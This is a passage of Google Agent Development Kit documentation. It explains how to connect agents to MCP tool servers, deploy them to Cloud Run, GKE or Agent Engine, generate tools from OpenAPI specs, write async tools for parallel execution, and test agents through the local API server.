Use in an agent root_agent = LlmAgent( model='gemini-2.0-flash', # Adjust model name if needed based on availability name='enterprise_assistant', instruction='Help user accessing their file systems', tools=[toolset], # Provide the MCP tools to the ADK agent ) return root_agent, toolset # --- Step 2: Main Execution Logic --- async def async_main(): session_service = InMemorySessionService() # Artifact service might not be needed for this example artifacts_service = InMemoryArtifactService() session = await session_service.create_session( state={}, app_name='mcp_filesystem_app', user_id='user_fs' ) # TODO: Change the query to be relevant to YOUR specified folder. # e.g., "list files in the 'documents' subfolder" or "read the file 'notes.txt'" query = "list files in the tests folder" print(f"User Query: '{query}'") content = types.Content(role='user', parts=[types.Part(text=query)]) root_agent, toolset = await get_agent_async() runner = Runner( app_name='mcp_filesystem_app', agent=root_agent, artifact_service=artifacts_service, # Optional session_service=session_service, ) print("Running agent...") events_async = runner.run_async( session_id=session.id, user_id=session.user_id, new_message=content ) async for event in events_async: print(f"Event received: {event}") # Cleanup is handled automatically by the agent framework # But you can also manually close if needed: print("Closing MCP server connection...") await toolset.close() print("Cleanup complete.") if __name__ == '__main__': try: asyncio.run(async_main()) except Exception as e: print(f"An error occurred: {e}") ``` ## Key considerations When working with MCP and ADK, keep these points in mind: - **Protocol vs. Library:** MCP is a protocol specification, defining communication rules. ADK is a Python library/framework for building agents. McpToolset bridges these by implementing the client side of the MCP protocol within the ADK framework. Conversely, building an MCP server in Python requires using the model-context-protocol library. - **ADK Tools vs. MCP Tools:** - ADK Tools (BaseTool, FunctionTool, AgentTool, etc.) are Python objects designed for direct use within the ADK's LlmAgent and Runner. - MCP Tools are capabilities exposed by an MCP Server according to the protocol's schema. McpToolset makes these look like ADK tools to an LlmAgent. - **Asynchronous nature:** Both ADK and the MCP Python library are heavily based on the asyncio Python library. Tool implementations and server handlers should generally be async functions. - **Stateful sessions (MCP):** MCP establishes stateful, persistent connections between a client and server instance. This differs from typical stateless REST APIs. - **Deployment:** This statefulness can pose challenges for scaling and deployment, especially for remote servers handling many users. The original MCP design often assumed client and server were co-located. Managing these persistent connections requires careful infrastructure considerations (e.g., load balancing, session affinity). - **ADK McpToolset:** Manages this connection lifecycle. The exit_stack pattern shown in the examples is crucial for ensuring the connection (and potentially the server process) is properly terminated when the ADK agent finishes. ## Deploying Agents with MCP Tools When deploying ADK agents that use MCP tools to production environments like Cloud Run, GKE, or Vertex AI Agent Engine, you need to consider how MCP connections will work in containerized and distributed environments. ### Critical Deployment Requirement: Synchronous Agent Definition **⚠️ Important:** When deploying agents with MCP tools, the agent and its McpToolset must be defined **synchronously** in your `agent.py` file. While `adk web` allows for asynchronous agent creation, deployment environments require synchronous instantiation. ```python # ✅ CORRECT: Synchronous agent definition for deployment import os from google.adk.agents.llm_agent import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters _allowed_path = os.path.dirname(os.path.abspath(__file__)) root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction=f'Help user accessing their file systems. Allowed directory: {_allowed_path}', tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=['-y', '@modelcontextprotocol/server-filesystem', _allowed_path], ), timeout=5, # Configure appropriate timeouts ), # Filter tools for security in production tool_filter=[ 'read_file', 'read_multiple_files', 'list_directory', 'directory_tree', 'search_files', 'get_file_info', 'list_allowed_directories', ], ) ], ) ``` ```python # ❌ WRONG: Asynchronous patterns don't work in deployment async def get_agent(): # This won't work for deployment toolset = await create_mcp_toolset_async() return LlmAgent(tools=[toolset]) ``` ### Quick Deployment Commands #### Vertex AI Agent Engine ```bash uv run adk deploy agent_engine \ --project= \ --region= \ --staging_bucket="gs://" \ --display_name="My MCP Agent" \ ./path/to/your/agent_directory ``` #### Cloud Run ```bash uv run adk deploy cloud_run \ --project= \ --region= \ --service_name= \ ./path/to/your/agent_directory ``` ### Deployment Patterns #### Pattern 1: Self-Contained Stdio MCP Servers For MCP servers that can be packaged as npm packages or Python modules (like `@modelcontextprotocol/server-filesystem`), you can include them directly in your agent container: **Container Requirements:** ```dockerfile # Example for npm-based MCP servers FROM python:3.13-slim # Install Node.js and npm for MCP servers RUN apt-get update && apt-get install -y nodejs npm && rm -rf /var/lib/apt/lists/* # Install your Python dependencies COPY requirements.txt . RUN pip install -r requirements.txt # Copy your agent code COPY . . # Your agent can now use StdioConnectionParams with 'npx' commands CMD ["python", "main.py"] ``` **Agent Configuration:** ```python # This works in containers because npx and the MCP server run in the same environment McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/app/data"], ), ), ) ``` #### Pattern 2: Remote MCP Servers (Streamable HTTP) For production deployments requiring scalability, deploy MCP servers as separate services and connect via Streamable HTTP: **MCP Server Deployment (Cloud Run):** ```python # deploy_mcp_server.py - Separate Cloud Run service using Streamable HTTP import contextlib import logging from collections.abc import AsyncIterator from typing import Any import anyio import click import mcp.types as types from mcp.server.lowlevel import Server from mcp.server.streamable_http_manager import StreamableHTTPSessionManager from starlette.applications import Starlette from starlette.routing import Mount from starlette.types import Receive, Scope, Send logger = logging.getLogger(__name__) def create_mcp_server(): """Create and configure the MCP server.""" app = Server("adk-mcp-streamable-server") @app.call_tool() async def call_tool(name: str, arguments: dict[str, Any]) -> list[types.ContentBlock]: """Handle tool calls from MCP clients.""" # Example tool implementation - replace with your actual ADK tools if name == "example_tool": result = arguments.get("input", "No input provided") return [ types.TextContent( type="text", text=f"Processed: {result}" ) ] else: raise ValueError(f"Unknown tool: {name}") @app.list_tools() async def list_tools() -> list[types.Tool]: """List available tools.""" return [ types.Tool( name="example_tool", description="Example tool for demonstration", inputSchema={ "type": "object", "properties": { "input": { "type": "string", "description": "Input text to process" } }, "required": ["input"] } ) ] return app def main(port: int = 8080, json_response: bool = False): """Main server function.""" logging.basicConfig(level=logging.INFO) app = create_mcp_server() # Create session manager with stateless mode for scalability session_manager = StreamableHTTPSessionManager( app=app, event_store=None, json_response=json_response, stateless=True, # Important for Cloud Run scalability ) async def handle_streamable_http(scope: Scope, receive: Receive, send: Send) -> None: await session_manager.handle_request(scope, receive, send) @contextlib.asynccontextmanager async def lifespan(app: Starlette) -> AsyncIterator[None]: """Manage session manager lifecycle.""" async with session_manager.run(): logger.info("MCP Streamable HTTP server started!") try: yield finally: logger.info("MCP server shutting down...") # Create ASGI application starlette_app = Starlette( debug=False, # Set to False for production routes=[ Mount("/mcp", app=handle_streamable_http), ], lifespan=lifespan, ) import uvicorn uvicorn.run(starlette_app, host="0.0.0.0", port=port) if __name__ == "__main__": main() ``` **Agent Configuration for Remote MCP:** ```python # Your ADK agent connects to the remote MCP service via Streamable HTTP McpToolset( connection_params=StreamableHTTPConnectionParams( url="https://your-mcp-server-url.run.app/mcp", headers={"Authorization": "Bearer your-auth-token"} ), ) ``` #### Pattern 3: Sidecar MCP Servers (GKE) In Kubernetes environments, you can deploy MCP servers as sidecar containers: ```yaml # deployment.yaml - GKE with MCP sidecar apiVersion: apps/v1 kind: Deployment metadata: name: adk-agent-with-mcp spec: template: spec: containers: # Main ADK agent container - name: adk-agent image: your-adk-agent:latest ports: - containerPort: 8080 env: - name: MCP_SERVER_URL value: "http://localhost:8081" # MCP server sidecar - name: mcp-server image: your-mcp-server:latest ports: - containerPort: 8081 ``` ### Connection Management Considerations #### Stdio Connections - **Pros:** Simple setup, process isolation, works well in containers - **Cons:** Process overhead, not suitable for high-scale deployments - **Best for:** Development, single-tenant deployments, simple MCP servers #### SSE/HTTP Connections - **Pros:** Network-based, scalable, can handle multiple clients - **Cons:** Requires network infrastructure, authentication complexity - **Best for:** Production deployments, multi-tenant systems, external MCP services ### Production Deployment Checklist When deploying agents with MCP tools to production: **✅ Connection Lifecycle** - Ensure proper cleanup of MCP connections using exit_stack patterns - Configure appropriate timeouts for connection establishment and requests - Implement retry logic for transient connection failures **✅ Resource Management** - Monitor memory usage for stdio MCP servers (each spawns a process) - Configure appropriate CPU/memory limits for MCP server processes - Consider connection pooling for remote MCP servers **✅ Security** - Use authentication headers for remote MCP connections - Restrict network access between ADK agents and MCP servers - **Filter MCP tools using `tool_filter` to limit exposed functionality** - Validate MCP tool inputs to prevent injection attacks - Use restrictive file paths for filesystem MCP servers (e.g., `os.path.dirname(os.path.abspath(__file__))`) - Consider read-only tool filters for production environments **✅ Monitoring & Observability** - Log MCP connection establishment and teardown events - Monitor MCP tool execution times and success rates - Set up alerts for MCP connection failures **✅ Scalability** - For high-volume deployments, prefer remote MCP servers over stdio - Configure session affinity if using stateful MCP servers - Consider MCP server connection limits and implement circuit breakers ### Environment-Specific Configurations #### Cloud Run ```python # Cloud Run environment variables for MCP configuration import os # Detect Cloud Run environment if os.getenv('K_SERVICE'): # Use remote MCP servers in Cloud Run mcp_connection = SseConnectionParams( url=os.getenv('MCP_SERVER_URL'), headers={'Authorization': f"Bearer {os.getenv('MCP_AUTH_TOKEN')}"} ) else: # Use stdio for local development mcp_connection = StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/tmp"] ) ) McpToolset(connection_params=mcp_connection) ``` #### GKE ```python # GKE-specific MCP configuration # Use service discovery for MCP servers within the cluster McpToolset( connection_params=SseConnectionParams( url="http://mcp-service.default.svc.cluster.local:8080/sse" ), ) ``` #### Vertex AI Agent Engine ```python # Agent Engine managed deployment # Prefer lightweight, self-contained MCP servers or external services McpToolset( connection_params=SseConnectionParams( url="https://your-managed-mcp-service.googleapis.com/sse", headers={'Authorization': 'Bearer $(gcloud auth print-access-token)'} ), ) ``` ### Troubleshooting Deployment Issues **Common MCP Deployment Problems:** 1. **Stdio Process Startup Failures** ```python # Debug stdio connection issues McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command='npx', args=["-y", "@modelcontextprotocol/server-filesystem", "/app/data"], # Add environment debugging env={'DEBUG': '1'} ), ), ) ``` 1. **Network Connectivity Issues** ```python # Test remote MCP connectivity import aiohttp async def test_mcp_connection(): async with aiohttp.ClientSession() as session: async with session.get('https://your-mcp-server.com/health') as resp: print(f"MCP Server Health: {resp.status}") ``` 1. **Resource Exhaustion** 1. Monitor container memory usage when using stdio MCP servers 1. Set appropriate limits in Kubernetes deployments 1. Use remote MCP servers for resource-intensive operations ## Further Resources - [Model Context Protocol Documentation](https://modelcontextprotocol.io/) - [MCP Specification](https://modelcontextprotocol.io/specification/) - [MCP Python SDK & Examples](https://github.com/modelcontextprotocol/) # Integrate REST APIs with OpenAPI Supported in ADKPython v0.1.0 ADK simplifies interacting with external REST APIs by automatically generating callable tools directly from an [OpenAPI Specification (v3.x)](https://swagger.io/specification/). This eliminates the need to manually define individual function tools for each API endpoint. Core Benefit Use `OpenAPIToolset` to instantly create agent tools (`RestApiTool`) from your existing API documentation (OpenAPI spec), enabling agents to seamlessly call your web services. ## Key Components - **`OpenAPIToolset`**: This is the primary class you'll use. You initialize it with your OpenAPI specification, and it handles the parsing and generation of tools. - **`RestApiTool`**: This class represents a single, callable API operation (like `GET /pets/{petId}` or `POST /pets`). `OpenAPIToolset` creates one `RestApiTool` instance for each operation defined in your spec. ## How it Works The process involves these main steps when you use `OpenAPIToolset`: 1. **Initialization & Parsing**: - You provide the OpenAPI specification to `OpenAPIToolset` either as a Python dictionary, a JSON string, or a YAML string. - The toolset internally parses the spec, resolving any internal references (`$ref`) to understand the complete API structure. 1. **Operation Discovery**: - It identifies all valid API operations (e.g., `GET`, `POST`, `PUT`, `DELETE`) defined within the `paths` object of your specification. 1. **Tool Generation**: - For each discovered operation, `OpenAPIToolset` automatically creates a corresponding `RestApiTool` instance. - **Tool Name**: Derived from the `operationId` in the spec (converted to `snake_case`, max 60 chars). If `operationId` is missing, a name is generated from the method and path. - **Tool Description**: Uses the `summary` or `description` from the operation for the LLM. - **API Details**: Stores the required HTTP method, path, server base URL, parameters (path, query, header, cookie), and request body schema internally. 1. **`RestApiTool` Functionality**: Each generated `RestApiTool`: - **Schema Generation**: Dynamically creates a `FunctionDeclaration` based on the operation's parameters and request body. This schema tells the LLM how to call the tool (what arguments are expected). - **Execution**: When called by the LLM, it constructs the correct HTTP request (URL, headers, query params, body) using the arguments provided by the LLM and the details from the OpenAPI spec. It handles authentication (if configured) and executes the API call using the `requests` library. - **Response Handling**: Returns the API response (typically JSON) back to the agent flow. 1. **Authentication**: You can configure global authentication (like API keys or OAuth - see [Authentication](/adk-docs/tools/authentication/) for details) when initializing `OpenAPIToolset`. This authentication configuration is automatically applied to all generated `RestApiTool` instances. ## Usage Workflow Follow these steps to integrate an OpenAPI spec into your agent: 1. **Obtain Spec**: Get your OpenAPI specification document (e.g., load from a `.json` or `.yaml` file, fetch from a URL). 1. **Instantiate Toolset**: Create an `OpenAPIToolset` instance, passing the spec content and type (`spec_str`/`spec_dict`, `spec_str_type`). Provide authentication details (`auth_scheme`, `auth_credential`) if required by the API. ```python from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset # Example with a JSON string openapi_spec_json = '...' # Your OpenAPI JSON string toolset = OpenAPIToolset(spec_str=openapi_spec_json, spec_str_type="json") # Example with a dictionary # openapi_spec_dict = {...} # Your OpenAPI spec as a dict # toolset = OpenAPIToolset(spec_dict=openapi_spec_dict) ``` 1. **Add to Agent**: Include the retrieved tools in your `LlmAgent`'s `tools` list. ```python from google.adk.agents import LlmAgent my_agent = LlmAgent( name="api_interacting_agent", model="gemini-2.0-flash", # Or your preferred model tools=[toolset], # Pass the toolset # ... other agent config ... ) ``` 1. **Instruct Agent**: Update your agent's instructions to inform it about the new API capabilities and the names of the tools it can use (e.g., `list_pets`, `create_pet`). The tool descriptions generated from the spec will also help the LLM. 1. **Run Agent**: Execute your agent using the `Runner`. When the LLM determines it needs to call one of the APIs, it will generate a function call targeting the appropriate `RestApiTool`, which will then handle the HTTP request automatically. ## Example This example demonstrates generating tools from a simple Pet Store OpenAPI spec (using `httpbin.org` for mock responses) and interacting with them via an agent. Code: Pet Store API openapi_example.py ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio import uuid # For unique session IDs from dotenv import load_dotenv from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types # --- OpenAPI Tool Imports --- from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset # --- Load Environment Variables (If ADK tools need them, e.g., API keys) --- load_dotenv() # Create a .env file in the same directory if needed # --- Constants --- APP_NAME_OPENAPI = "openapi_petstore_app" USER_ID_OPENAPI = "user_openapi_1" SESSION_ID_OPENAPI = f"session_openapi_{uuid.uuid4()}" # Unique session ID AGENT_NAME_OPENAPI = "petstore_manager_agent" GEMINI_MODEL = "gemini-2.0-flash" # --- Sample OpenAPI Specification (JSON String) --- # A basic Pet Store API example using httpbin.org as a mock server openapi_spec_string = """ { "openapi": "3.0.0", "info": { "title": "Simple Pet Store API (Mock)", "version": "1.0.1", "description": "An API to manage pets in a store, using httpbin for responses." }, "servers": [ { "url": "https://httpbin.org", "description": "Mock server (httpbin.org)" } ], "paths": { "/get": { "get": { "summary": "List all pets (Simulated)", "operationId": "listPets", "description": "Simulates returning a list of pets. Uses httpbin's /get endpoint which echoes query parameters.", "parameters": [ { "name": "limit", "in": "query", "description": "Maximum number of pets to return", "required": false, "schema": { "type": "integer", "format": "int32" } }, { "name": "status", "in": "query", "description": "Filter pets by status", "required": false, "schema": { "type": "string", "enum": ["available", "pending", "sold"] } } ], "responses": { "200": { "description": "A list of pets (echoed query params).", "content": { "application/json": { "schema": { "type": "object" } } } } } } }, "/post": { "post": { "summary": "Create a pet (Simulated)", "operationId": "createPet", "description": "Simulates adding a new pet. Uses httpbin's /post endpoint which echoes the request body.", "requestBody": { "description": "Pet object to add", "required": true, "content": { "application/json": { "schema": { "type": "object", "required": ["name"], "properties": { "name": {"type": "string", "description": "Name of the pet"}, "tag": {"type": "string", "description": "Optional tag for the pet"} } } } } }, "responses": { "201": { "description": "Pet created successfully (echoed request body).", "content": { "application/json": { "schema": { "type": "object" } } } } } } }, "/get?petId={petId}": { "get": { "summary": "Info for a specific pet (Simulated)", "operationId": "showPetById", "description": "Simulates returning info for a pet ID. Uses httpbin's /get endpoint.", "parameters": [ { "name": "petId", "in": "path", "description": "This is actually passed as a query param to httpbin /get", "required": true, "schema": { "type": "integer", "format": "int64" } } ], "responses": { "200": { "description": "Information about the pet (echoed query params)", "content": { "application/json": { "schema": { "type": "object" } } } }, "404": { "description": "Pet not found (simulated)" } } } } } } """ # --- Create OpenAPIToolset --- petstore_toolset = OpenAPIToolset( spec_str=openapi_spec_string, spec_str_type='json', # No authentication needed for httpbin.org ) # --- Agent Definition --- root_agent = LlmAgent( name=AGENT_NAME_OPENAPI, model=GEMINI_MODEL, tools=[petstore_toolset], # Pass the list of RestApiTool objects instruction="""You are a Pet Store assistant managing pets via an API. Use the available tools to fulfill user requests. When creating a pet, confirm the details echoed back by the API. When listing pets, mention any filters used (like limit or status). When showing a pet by ID, state the ID you requested. """, description="Manages a Pet Store using tools generated from an OpenAPI spec." ) # --- Session and Runner Setup --- async def setup_session_and_runner(): session_service_openapi = InMemorySessionService() runner_openapi = Runner( agent=root_agent, app_name=APP_NAME_OPENAPI, session_service=session_service_openapi, ) await session_service_openapi.create_session( app_name=APP_NAME_OPENAPI, user_id=USER_ID_OPENAPI, session_id=SESSION_ID_OPENAPI, ) return runner_openapi # --- Agent Interaction Function --- async def call_openapi_agent_async(query, runner_openapi): print("\n--- Running OpenAPI Pet Store Agent ---") print(f"Query: {query}") content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "Agent did not provide a final text response." try: async for event in runner_openapi.run_async( user_id=USER_ID_OPENAPI, session_id=SESSION_ID_OPENAPI, new_message=content ): # Optional: Detailed event logging for debugging # print(f" DEBUG Event: Author={event.author}, Type={'Final' if event.is_final_response() else 'Intermediate'}, Content={str(event.content)[:100]}...") if event.get_function_calls(): call = event.get_function_calls()[0] print(f" Agent Action: Called function '{call.name}' with args {call.args}") elif event.get_function_responses(): response = event.get_function_responses()[0] print(f" Agent Action: Received response for '{response.name}'") # print(f" Tool Response Snippet: {str(response.response)[:200]}...") # Uncomment for response details elif event.is_final_response() and event.content and event.content.parts: # Capture the last final text response final_response_text = event.content.parts[0].text.strip() print(f"Agent Final Response: {final_response_text}") except Exception as e: print(f"An error occurred during agent run: {e}") import traceback traceback.print_exc() # Print full traceback for errors print("-" * 30) # --- Run Examples --- async def run_openapi_example(): runner_openapi = await setup_session_and_runner() # Trigger listPets await call_openapi_agent_async("Show me the pets available.", runner_openapi) # Trigger createPet await call_openapi_agent_async("Please add a new dog named 'Dukey'.", runner_openapi) # Trigger showPetById await call_openapi_agent_async("Get info for pet with ID 123.", runner_openapi) # --- Execute --- if __name__ == "__main__": print("Executing OpenAPI example...") # Use asyncio.run() for top-level execution try: asyncio.run(run_openapi_example()) except RuntimeError as e: if "cannot be called from a running event loop" in str(e): print("Info: Cannot run asyncio.run from a running event loop (e.g., Jupyter/Colab).") # If in Jupyter/Colab, you might need to run like this: # await run_openapi_example() else: raise e print("OpenAPI example finished.") ``` # Increase tool performance with parallel execution Supported in ADKPython v1.10.0 Starting with Agent Development Kit (ADK) version 1.10.0 for Python, the framework attempts to run any agent-requested [function tools](/adk-docs/tools-custom/function-tools/) in parallel. This behavior can significantly improve the performance and responsiveness of your agents, particularly for agents that rely on multiple external APIs or long-running tasks. For example, if you have 3 tools that each take 2 seconds, by running them in parallel, the total execution time will be closer to 2 seconds, instead of 6 seconds. The ability to run tool functions parallel can improve the performance of your agents, particularly in the following scenarios: - **Research tasks:** Where the agent collects information from multiple sources before proceeding to the next stage of the workflow. - **API calls:** Where the agent accesses several APIs independently, such as searching for available flights using APIs from multiple airlines. - **Publishing and communication tasks:** When the agent needs to publish or communicate through multiple, independent channels or multiple recipients. However, your custom tools must be built with asynchronous execution support to enable this performance improvement. This guide explains how parallel tool execution works in the ADK and how to build your tools to take full advantage of this processing feature. Warning Any ADK Tools that use synchronous processing in a set of tool function calls will block other tools from executing in parallel, even if the other tools allow for parallel execution. ## Build parallel-ready tools Enable parallel execution of your tool functions by defining them as asynchronous functions. In Python code, this means using `async def` and `await` syntax which allows the ADK to run them concurrently in an `asyncio` event loop. The following sections show examples of agent tools built for parallel processing and asynchronous operations. ### Example of http web call The following code example show how to modify the `get_weather()` function to operate asynchronously and allow for parallel execution: ```python async def get_weather(city: str) -> dict: async with aiohttp.ClientSession() as session: async with session.get(f"http://api.weather.com/{city}") as response: return await response.json() ``` ### Example of database call The following code example show how to write a database calling function to operate asynchronously: ```python async def query_database(query: str) -> list: async with asyncpg.connect("postgresql://...") as conn: return await conn.fetch(query) ``` ### Example of yielding behavior for long loops In cases where a tool is processing multiple requests or numerous long-running requests, consider adding yielding code to allow other tools to execute, as shown in the following code sample: ```python async def process_data(data: list) -> dict: results = [] for i, item in enumerate(data): processed = await process_item(item) # Yield point results.append(processed) # Add periodic yield points for long loops if i % 100 == 0: await asyncio.sleep(0) # Yield control return {"results": results} ``` Important Use the `asyncio.sleep()` function for pauses to avoid blocking execution of other functions. ### Example of thread pools for intensive operations When performing processing-intensive functions, consider creating thread pools for better management of available computing resources, as shown in the following example: ```python async def cpu_intensive_tool(data: list) -> dict: loop = asyncio.get_event_loop() # Use thread pool for CPU-bound work with ThreadPoolExecutor() as executor: result = await loop.run_in_executor( executor, expensive_computation, data ) return {"result": result} ``` ### Example of process chunking When performing processes on long lists or large amounts of data, consider combining a thread pool technique with dividing up processing into chunks of data, and yielding processing time between the chunks, as shown in the following example: ```python async def process_large_dataset(dataset: list) -> dict: results = [] chunk_size = 1000 for i in range(0, len(dataset), chunk_size): chunk = dataset[i:i + chunk_size] # Process chunk in thread pool loop = asyncio.get_event_loop() with ThreadPoolExecutor() as executor: chunk_result = await loop.run_in_executor( executor, process_chunk, chunk ) results.extend(chunk_result) # Yield control between chunks await asyncio.sleep(0) return {"total_processed": len(results), "results": results} ``` ## Write parallel-ready prompts and tool descriptions When building prompts for AI models, consider explicitly specifying or hinting that function calls be made in parallel. The following example of an AI prompt directs the model to use tools in parallel: ```text When users ask for multiple pieces of information, always call functions in parallel. Examples: - "Get weather for London and currency rate USD to EUR" → Call both functions simultaneously - "Compare cities A and B" → Call get_weather, get_population, get_distance in parallel - "Analyze multiple stocks" → Call get_stock_price for each stock in parallel Always prefer multiple specific function calls over single complex calls. ``` The following example shows a tool function description that hints at more efficient use through parallel execution: ```python async def get_weather(city: str) -> dict: """Get current weather for a single city. This function is optimized for parallel execution - call multiple times for different cities. Args: city: Name of the city, for example: 'London', 'New York' Returns: Weather data including temperature, conditions, humidity """ await asyncio.sleep(2) # Simulate API call return {"city": city, "temp": 72, "condition": "sunny"} ``` ## Next steps For more information on building Tools for agents and function calling, see [Function Tools](/adk-docs/tools-custom/function-tools/). For more detailed examples of tools that take advantage of parallel processing, see the samples in the [adk-python](https://github.com/google/adk-python/tree/main/contributing/samples/parallel_functions) repository. # Run Agents # Agent Runtime Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 ADK provides several ways to run and test your agents during development. Choose the method that best fits your development workflow. ## Ways to run agents - **Dev UI** ______________________________________________________________________ Use `adk web` to launch a browser-based interface for interacting with your agents. [Use the Web Interface](https://google.github.io/adk-docs/runtime/web-interface/index.md) - **Command Line** ______________________________________________________________________ Use `adk run` to interact with your agents directly in the terminal. [Use the Command Line](https://google.github.io/adk-docs/runtime/command-line/index.md) - **API Server** ______________________________________________________________________ Use `adk api_server` to expose your agents through a RESTful API. [Use the API Server](https://google.github.io/adk-docs/runtime/api-server/index.md) ## Technical reference For more in-depth information on runtime configuration and behavior, see these pages: - **[Event Loop](https://google.github.io/adk-docs/runtime/event-loop/index.md)**: Understand the core event loop that powers ADK, including the yield/pause/resume cycle. - **[Resume Agents](https://google.github.io/adk-docs/runtime/resume/index.md)**: Learn how to resume agent execution from a previous state. - **[Runtime Config](https://google.github.io/adk-docs/runtime/runconfig/index.md)**: Configure runtime behavior with RunConfig. # Use the API Server Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Before you deploy your agent, you should test it to ensure that it is working as intended. Use the API server in ADK to expose your agents through a REST API for programmatic testing and integration. ## Start the API server Use the following command to run your agent in an ADK API server: ```shell adk api_server ``` ```shell npx adk api_server ``` ```shell go run agent.go web api ``` Make sure to update the port number. With Maven, compile and run the ADK web server: ```console mvn compile exec:java \ -Dexec.args="--adk.agents.source-dir=src/main/java/agents --server.port=8080" ``` With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its plugins section: ```groovy plugins { id('java') // other plugins } ``` Then, elsewhere in the build file, at the top-level, create a new task: ```groovy tasks.register('runADKWebServer', JavaExec) { dependsOn classes classpath = sourceSets.main.runtimeClasspath mainClass = 'com.google.adk.web.AdkWebServer' args '--adk.agents.source-dir=src/main/java/agents', '--server.port=8080' } ``` Finally, on the command-line, run the following command: ```console gradle runADKWebServer ``` In Java, both the Dev UI and the API server are bundled together. This command will launch a local web server, where you can run cURL commands or send API requests to test your agent. By default, the server runs on `http://localhost:8000`. Advanced Usage and Debugging For a complete reference on all available endpoints, request/response formats, and tips for debugging (including how to use the interactive API documentation), see the **ADK API Server Guide** below. ## Test locally Testing locally involves launching a local web server, creating a session, and sending queries to your agent. First, ensure you are in the correct working directory. For TypeScript, you should be inside the agent project directory itself. ```console parent_folder/ └── my_sample_agent/ <-- For TypeScript, run commands from here └── agent.py (or Agent.java or agent.ts) ``` **Launch the Local Server** Next, launch the local server using the commands listed above. The output should appear similar to: ```shell INFO: Started server process [12345] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://localhost:8000 (Press CTRL+C to quit) ``` ```shell +-----------------------------------------------------------------------------+ | ADK Web Server started | | | | For local testing, access at http://localhost:8000. | +-----------------------------------------------------------------------------+ ``` ```shell 2025-05-13T23:32:08.972-06:00 INFO 37864 --- [ebServer.main()] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat started on port 8080 (http) with context path '/' 2025-05-13T23:32:08.980-06:00 INFO 37864 --- [ebServer.main()] com.google.adk.web.AdkWebServer : Started AdkWebServer in 1.15 seconds (process running for 2.877) 2025-05-13T23:32:08.981-06:00 INFO 37864 --- [ebServer.main()] com.google.adk.web.AdkWebServer : AdkWebServer application started successfully. ``` Your server is now running locally. Ensure you use the correct ***port number*** in all the subsequent commands. **Create a new session** With the API server still running, open a new terminal window or tab and create a new session with the agent using: ```shell curl -X POST http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_123 \ -H "Content-Type: application/json" \ -d '{"key1": "value1", "key2": 42}' ``` Let's break down what's happening: - `http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_123`: This creates a new session for your agent `my_sample_agent`, which is the name of the agent folder, for a user ID (`u_123`) and for a session ID (`s_123`). You can replace `my_sample_agent` with the name of your agent folder. You can replace `u_123` with a specific user ID, and `s_123` with a specific session ID. - `{"key1": "value1", "key2": 42}`: This is optional. You can use this to customize the agent's pre-existing state (dict) when creating the session. This should return the session information if it was created successfully. The output should appear similar to: ```json {"id":"s_123","appName":"my_sample_agent","userId":"u_123","state":{"key1":"value1","key2":42},"events":[],"lastUpdateTime":1743711430.022186} ``` Info You cannot create multiple sessions with exactly the same user ID and session ID. If you try to, you may see a response, like: `{"detail":"Session already exists: s_123"}`. To fix this, you can either delete that session (e.g., `s_123`), or choose a different session ID. **Send a query** There are two ways to send queries via POST to your agent, via the `/run` or `/run_sse` routes. - `POST http://localhost:8000/run`: collects all events as a list and returns the list all at once. Suitable for most users (if you are unsure, we recommend using this one). - `POST http://localhost:8000/run_sse`: returns as Server-Sent-Events, which is a stream of event objects. Suitable for those who want to be notified as soon as the event is available. With `/run_sse`, you can also set `streaming` to `true` to enable token-level streaming. **Using `/run`** ```shell curl -X POST http://localhost:8000/run \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_123", "newMessage": { "role": "user", "parts": [{ "text": "Hey whats the weather in new york today" }] } }' ``` In TypeScript, currently only `camelCase` field names are supported (e.g. `appName`, `userId`, `sessionId`, etc.). If using `/run`, you will see the full output of events at the same time, as a list, which should appear similar to: ```json [{"content":{"parts":[{"functionCall":{"id":"af-e75e946d-c02a-4aad-931e-49e4ab859838","args":{"city":"new york"},"name":"get_weather"}}],"role":"model"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"longRunningToolIds":[],"id":"2Btee6zW","timestamp":1743712220.385936},{"content":{"parts":[{"functionResponse":{"id":"af-e75e946d-c02a-4aad-931e-49e4ab859838","name":"get_weather","response":{"status":"success","report":"The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit)."}}}],"role":"user"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"PmWibL2m","timestamp":1743712221.895042},{"content":{"parts":[{"text":"OK. The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees 